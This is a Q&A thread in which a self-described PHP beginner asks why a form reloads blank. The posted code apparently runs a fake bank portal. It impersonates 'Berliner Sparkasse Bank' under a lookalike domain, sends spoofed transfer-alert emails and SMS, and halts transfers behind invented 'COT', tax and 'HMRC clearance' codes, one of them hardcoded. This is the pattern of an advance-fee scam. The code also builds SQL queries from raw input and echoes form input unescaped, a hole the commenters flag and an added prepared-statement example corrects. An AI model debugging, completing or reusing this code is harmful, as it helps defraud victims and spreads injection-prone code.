-1

I designed a form to submit to a database, but when submitted the form returns blank and reloads the form. I will be glad if you guys can help with my project work.

I am a PHP beginner now. I am trying to work on a school project where the HTML form will query the PHP form.

I uploaded the files, then when trying the form I keep seeing a blank page returned, without the form proceeding to the next page.

<table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr>
          <td width="50%" valign="top">
    <?php if ($curr_user['balance2'] != 0) { ?>
    <table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td class="head"><img src="images/i_qt_text.png" width="220" height="27" /></td>
            </tr>
            <tr>
              <td style="border:#000080 1px solid; padding:5px;"><form id="form1" name="form1" method="post" action="" autocomplete="off">
                <table width="100%" border="0" cellspacing="1">
    <?php if($error_msg != "") { ?>
    <tr>
    <td colspan="2" class="error_msg"><?php echo $error_msg; ?></td></tr>
    <?php }?>
                  <tr>
                    <td width="40%" nowrap="nowrap"><strong>Bank Name</strong></td>
                    <td width="60%" style="padding-left:1em;"><input name="bname" type="text" id="bname" value="<?php echo $_POST['bname']; ?>" /></td>
                  </tr>
      <tr>
                    <td width="40%" nowrap="nowrap"><strong>Bank Address</strong></td>
                    <td width="60%" style="padding-left:1em;"><input name="bcountry" type="text" id="bcountry" value="<?php echo $_POST['bcountry']; ?>" /></td>
                  </tr>
                  <tr>
                    <td nowrap="nowrap"><strong>Account Number</strong></td>
                    <td style="padding-left:1em;"><input name="accnum" type="text" id="accnum" value="<?php echo $_POST['accnum']; ?>" /></td>
                  </tr>
      
      <!-- New addition -->
      
      <tr>
                    <td nowrap="nowrap"><strong>Account Name </strong> </td>
                    <td style="padding-left:1em;"><input name="accname" type="text" id="accname" value="<?php echo $_POST['accname']; ?>" /></td>
                  </tr>

<tr>
                    <td nowrap="nowrap"><strong>Owner's Address </strong> </td>
                    <td style="padding-left:1em;"><input name="ownadd" type="text" id="ownadd" value="<?php echo $_POST['ownadd']; ?>" /></td>
                  </tr>
      <tr>
                    <td nowrap="nowrap"><strong>Routing Number </strong> </td>
                    <td style="padding-left:1em;"><input name="routnum" type="text" id="routnum" value="<?php echo $_POST['routnum']; ?>" /></td>
                  </tr>
      
      <!-- End, New addition -->
      
                  <tr>
                    <td nowrap="nowrap"><strong>Swift Code </strong> </td>
                    <td style="padding-left:1em;"><input name="sort" type="text" id="sort" value="<?php echo $_POST['sort']; ?>" /></td>
                  </tr>
                  <tr>
                    <td nowrap="nowrap"><strong>Amount</strong> </td>
                    <td style="padding-left:1em;"><input name="amount" type="text" id="amount" value="<?php echo $_POST['amount']; ?>" /></td>
                  </tr>
                  <tr>
                    <td>&nbsp;</td>
                    <td style="padding-left:1em;"><input name="submit" type="submit" class="submit" id="submit" value="Continue &gt;&gt;" /></td>
                  </tr>
                </table>
              </form></td>
            </tr>
          </table>
    <?php } else { ?>
    <table width="100%" border="0">
  <tr>
    <td class="error_msg">Your current available balance is &pound;0. For more information on account funding, please call <strong><?php echo $phone1; ?></strong>, dial <?php echo $phone2; ?> when calling from abroad or email <a href="mailto:info@<?php echo $email_domain; ?>"><strong>info@<?php echo $email_domain; ?></strong></a></td>
  </tr>
</table>
<?php } ?>
    </td>
          <td width="50%" valign="top" style="padding-left:20px;"><table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr>
              <td class="head">Important Information </td>
            </tr>
            <tr>
              <td bgcolor="#E8FFF8" style="border:#000080 1px solid; padding:5px;">- Please be sure to verify the recieving account details before you proceed with the fund transfer. <br />
- The minimum amount transferable is &pound;1,000 and the maximum is your available balance (&pound;<?php echo number_format($curr_user['balance2'],2); ?>). <br />
- Transfer requests normally takes about 5 minutes to process and about 6-72 hours before fund reaches its destination. </td>
            </tr>
          </table></td>
        </tr>
      </table>
<?php
if(isset($_POST['submit'])) {
    $bname=addslashes($_POST['bname']);
    $bcountry=addslashes($_POST['bcountry']);
    $accnum=addslashes($_POST['accnum']);
    $accname=addslashes($_POST['accname']);
    $ownadd=addslashes($_POST['ownadd']);
    $routnum=addslashes($_POST['routnum']);
    $sort=addslashes($_POST['sort']);
    $amount=addslashes($_POST['amount']);

    $error_msg="";

    if(strlen($bname) == 0) {
        $error_msg.="<li>Please enter receiving bank's name";
    }
    if(strlen($bcountry) == 0) {
        $error_msg.="<li>Please enter receiving bank's country";
    }
    if(strlen($accnum) == 0) {
        $error_msg.="<li>Please enter receiving account number</li>";
    }
    if(strlen($accname) == 0) {
        $error_msg.="<li>Please enter receiving account name</li>";
    }
    if(strlen($sort) == 0) {
        $error_msg.="<li>Please enter sort code</li>";
    }
    if(strlen($amount) == 0) {
        $error_msg.="<li>Please enter amount to be transferred</li>";
    }
    elseif(!is_numeric($amount)) {
        $error_msg.="<li>Amount must be digits only. No symbols allowed.</li>";
    }
    elseif($amount < 1000) {
        $error_msg.="<li>Minimum transferable amount is £1,000</li>";
    }
    elseif($amount > $curr_user['balance2']) {
        $error_msg.="<li>Maximum transferable amount is £".number_format($curr_user['balance2'],2)."</li>";
    }

    if($error_msg != "") {
        $error_msg="<b>Please correct the following errors:</b>".$error_msg;
    }
    elseif($curr_user['status'] != "Active") {
        $error_msg="Sorry, your account is restricted from performing this operation";
    }
    else {
        $tid=rand(100000,999999);
        mysql_query("INSERT INTO `history` (`id` ,`tid` ,`number` ,`date` ,`bname` ,`bcountry` ,`accnum` ,`accname` ,`ownadd` ,`routnum` ,`sort` ,`amount` ,`type` ,`details` ,`status`, `stat`)VALUES (NULL , '$tid', '$accid', NOW( ) , '$bname', '$bcountry', '$accnum', '$accname', '$ownadd', '$routnum', '$sort', '$amount', 'Fund Transfer', 'Wire Transfer to $accname, $bname, $bcountry(account number $accnum)', 'Pending Authorization', 'Unverified')");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
}
$rendered_page='transfer.html';

if(isset($_GET['sid'])) {
    $tid=base64_decode($_GET['sid']);
    $trans=mysql_fetch_array(mysql_query("SELECT * FROM history WHERE tid='$tid' LIMIT 1"));
}

if(isset($_GET['sid']) && $trans['stat'] == "Unverified") {
    $rendered_page='transfer2.html';
    if(isset($_POST['pin_submit'])) {
        $pin=addslashes($_POST['pin']);
        if(strlen($pin) == 0) {
            $error_msg="Please enter your account PIN to continue";
        }
        elseif(strlen($pin) < 5) {
            $error_msg="Account PIN must be five digits";
        }
        elseif(!is_numeric($pin)) {
            $error_msg="Account PIN must be digits only";
        }
        elseif(strcmp($pin,$curr_user['pin']) != 0) {
            $error_msg="Invalid account PIN. If you feel this is an error, please call <b>$phone1</b>";
        }
        else {
            mysql_query("UPDATE history SET stat='Unconfirmed' WHERE tid='$tid' LIMIT 1");
            redirect("?r=transfer&sid=".base64_encode($tid));
        }
    }
}

if(isset($_GET['sid']) && $trans['stat'] == "Unconfirmed") {
    if(isset($_POST['proceed'])) {
        mysql_query("UPDATE history SET stat='Progress_COT' WHERE tid='$tid' LIMIT 1");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
    $rendered_page='verify_transfer.html';
}
if(isset($_GET['sid']) && ($trans['stat'] == "Progress_COT" || $trans['stat'] == "Progress_TAX" || $trans['stat'] == "Progress_FSA" || $trans['stat'] == "Progress_209")) {
    $rendered_page='progress.html';
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_COT" && isset($_GET['done'])) || $trans['stat'] == "COT_Page")) {
    mysql_query("UPDATE history SET stat='COT_Page', status='Interrupted for COT Verification' WHERE tid='$tid' LIMIT 1");
    $rendered_page='cot.html';
}

if(isset($_POST['cot'])) {
    include('get_cot.php');
}

if(isset($_GET['sid']) && (($trans['stat'] == "Progress_TAX" && isset($_GET['done'])) || $trans['stat'] == "TAX_Page")) {
    if($curr_user['tax_status'] != 1) {
        mysql_query("UPDATE history SET stat='TAX_Page', status='Interrupted for Tax Clearance' WHERE tid='$tid' LIMIT 1");
        $rendered_page='tax.html';
    }
    else {
        mysql_query("UPDATE history SET stat='Progress_FSA' WHERE tid='$tid' LIMIT 1");
        redirect("?r=transfer&sid=".base64_encode($tid));
    }
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_FSA" && isset($_GET['done'])) || $trans['stat'] == "FSA_Page")) {
    mysql_query("UPDATE history SET stat='FSA_Page', status='Interrupted for HMRC Clearance' WHERE tid='$tid' LIMIT 1");
    if(isset($_POST['fsa'])) {
        $fsa=addslashes($_POST['fsa']);
        if(strlen($fsa) == 0) {
            $error_msg="Please enter HMRC code to proceed with transfer";
        }
        elseif(!is_numeric($fsa)) {
            $error_msg="HMRC code must be digits only";
        }
        elseif($fsa != "4493231") {
            $error_msg="HMRC code is invalid. If you feel this is an error, please call <b>$phone1</b>";
        }
        else {
            mysql_query("UPDATE history SET stat='Progress_209' WHERE tid='$tid' LIMIT 1");
            redirect("?r=transfer&sid=".base64_encode($tid));
        }
    }
    $rendered_page='fsa.html';
}
if(isset($_GET['sid']) && (($trans['stat'] == "Progress_209" && isset($_GET['done'])) || $trans['stat'] == "Done")) {
    mysql_query("UPDATE history SET stat='Done', status='Successful' WHERE tid='$tid' LIMIT 1");
    $bal=$curr_user['balance'] - $trans['amount'];
    $bal2=$curr_user['balance2'] - $trans['amount'];
    mysql_query("UPDATE users SET balance='$bal', balance2='$bal2' WHERE number='$accid' LIMIT 1");


$user=mysql_fetch_array(mysql_query("SELECT * FROM users WHERE number='$accid' LIMIT 1"));

        $recipient=$user['email'];
        $mob_tel=$user['phone'];
        $first_name=$user['firstname'];
        $last_name=$user['lastname'];
        $accountbalance= "$bal";
        $availablebal= "$bal2";
        date_default_timezone_set("Europe/London");
        $bankname=$trans['bname'];
        $bankcountry=$trans['bcountry'];
        $receiveraccnum=$trans['accnum'];
        $receiveraccname=$trans['accname'];
        $banksort=$trans['sort'];
        $sendingamount=$trans['amount'];
        $time = date("h:i:sa");

                $date = date('d/m/Y');
                $senderName = "Berliner Sparkasse Bank";

$fromEmailAddress = "no-reply-accountdept@b-sparkassede.com";

$emailSubject = "Funds Transfer Alert";

$comments = "\n Hello $first_name $last_name \n \n A funds transfer has just occurred in your e-Banking online account. If this transfer wasn't carried out by you, please report immediately to info@b-sparkassede.com or call 0 460 245 694 from within Germany and +32 460 245 694 from outside Germany. \n\n TRANSFER DETAILS \n \n BANK NAME: $bankname \n ACCOUNT NAME | NUMBER: $receiveraccname | $receiveraccnum \n BANK ADDRESS: $bankcountry \n BANK SORT CODE: $banksort \n \n AMOUNT: $sendingamount \n NEW BALANCE: $accountbalance \n AVAILABLE BALANCE: $availablebal \n \n TRANSFER DATE: $date \n TRANSFER TIME: $time \n \n \n \n Account Support Team \n For Berliner Sparkasse Bank.";



$mobilesender = "Acc Notify";

$message = "e-Banking ACCOUNT DEBIT
Acct: ***".substr($curr_user['number'],-6,6)."
Amount: $sendingamount
TO: $bankname | $receiveraccnum
Remarks: Wire Transfer
Bal: $availablebal
Date: $date | $time";

$loginuser="";

$loginpass="";


mail($recipient, $emailSubject, $comments, "From: $senderName <$fromEmailAddress>\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Transfer-Encoding: 8bit");

$url = "http://ediarosms.com/sms/api_v1?sub_account=$loginuser&sub_account_pass=$loginpass&action=send_sms&sender_id=".urlencode($mobilesender)."&message=".urlencode($message)."&recipients=".urlencode($mob_tel)."";

file_get_contents($url);








    $rendered_page='209.html';


}
?>
marc_s
  • Hi there Samsonase! That's a lot of detail, which is often good, but I think in this case it's pretty distressing to try to read through it all. Could you reduce this to a minimal section of code, just enough to try to show us what's up without making the work so long? That could be what gets you the help you need! –  Apr 12 '20 at 02:13
  • A couple of obvious problems: 1. You're using the `mysqli` interface, which is not only deprecated but will leave you vulnerable to [SQL injection attacks](https://stackoverflow.com/questions/601300/what-is-sql-injection). 2. You're calling ``mysql_query("INSERT INTO `history`...");`` but you're not checking the value returned by that function. – kmoser Apr 12 '20 at 02:54
  • **Warning:** `mysql_*` extension is deprecated as of PHP 5.5.0, and has been removed as of PHP 7.0.0. Instead, either the [mysqli](https://www.php.net/manual/en/book.mysqli.php) or [PDO_MySQL](https://www.php.net/manual/en/book.pdo.php) extension should be used. See also the [MySQL API Overview](https://www.php.net/manual/en/mysqlinfo.api.choosing.php) for further help while choosing a MySQL API. – Dharman Apr 13 '20 at 22:15
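
The two points raised in the comments above (queries built by splicing input into the SQL string, and a query result that is never checked), as an added example that is not part of the original post. It assumes an in-memory SQLite database in place of the page's MySQL one and a reduced `history` table; `insert_history` and `find_history` are hypothetical helper names.

```php
<?php
// Added example: in-memory SQLite stands in for the page's MySQL database.
$pdo = new PDO('sqlite::memory:');
// Make every failed query throw, so a broken INSERT cannot pass silently.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE history (
    id INTEGER PRIMARY KEY, tid TEXT UNIQUE, number TEXT,
    bname TEXT, accname TEXT, amount REAL, stat TEXT)');

// Insert with bound parameters: input is never spliced into the SQL text,
// so addslashes() is not needed and quotes in the data are harmless.
function insert_history(PDO $pdo, string $accid, array $in): string
{
    $tid = (string) random_int(100000, 999999);
    $stmt = $pdo->prepare(
        'INSERT INTO history (tid, number, bname, accname, amount, stat)
         VALUES (:tid, :number, :bname, :accname, :amount, :stat)');
    $stmt->execute([
        ':tid' => $tid, ':number' => $accid,
        ':bname' => $in['bname'], ':accname' => $in['accname'],
        ':amount' => (float) $in['amount'], ':stat' => 'Unverified',
    ]);
    return $tid;
}

// Lookup bound to both the tid and the owning account number.
function find_history(PDO $pdo, string $tid, string $accid): ?array
{
    $stmt = $pdo->prepare(
        'SELECT * FROM history WHERE tid = :tid AND number = :number');
    $stmt->execute([':tid' => $tid, ':number' => $accid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample input containing quote characters and markup.
$post = ['bname' => "O'Neil & Sons", 'accname' => '"><b>x</b>', 'amount' => '1500'];

try {
    $tid = insert_history($pdo, 'ACC-1', $post);
    $row = find_history($pdo, $tid, 'ACC-1');
    // Escape on output; the page's form echoes $_POST values raw into value attributes.
    echo '<input name="accname" value="',
        htmlspecialchars($row['accname'], ENT_QUOTES, 'UTF-8'), "\" />\n";
    var_dump(find_history($pdo, $tid, 'ACC-2')); // a different account gets no row
} catch (PDOException $e) {
    error_log('history query failed: ' . $e->getMessage()); // surface the failure
}
```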

2 Answers

1

Your form action attribute is empty.

Create a file form-action.php (may be in the same folder) and paste the second part of your code.

Then, add the action page in the form action attribute:

action="form-action.php"

Remember, every POST request has an action page. When you click Continue, the data passes from the form page to the action page according to input name.

When you click Continue, the form data passes to the form-action page and the form-action.php page is loaded.

If you want to pass POST data without redirecting to a new page (form-action.php), you can use jQuery Ajax. For this, visit

jQuery Ajax POST example with PHP

0

Your select query is not working properly; that's why the form can't submit. Your select query is not returning the data into your input fields. So please double-check your select query and test again whether your data is coming into the input fields. You can use a debugging tool to verify whether the data is coming or not:

var_dump(put_variable_name_here);
Hadi
  • The form is submitted into the database. Then the value is supposed to show on the next page; instead of the value showing on the next page, it returns to the form and shows blank. But how do I use this code? Should I paste it inside the form? – samsonase Apr 13 '20 at 10:53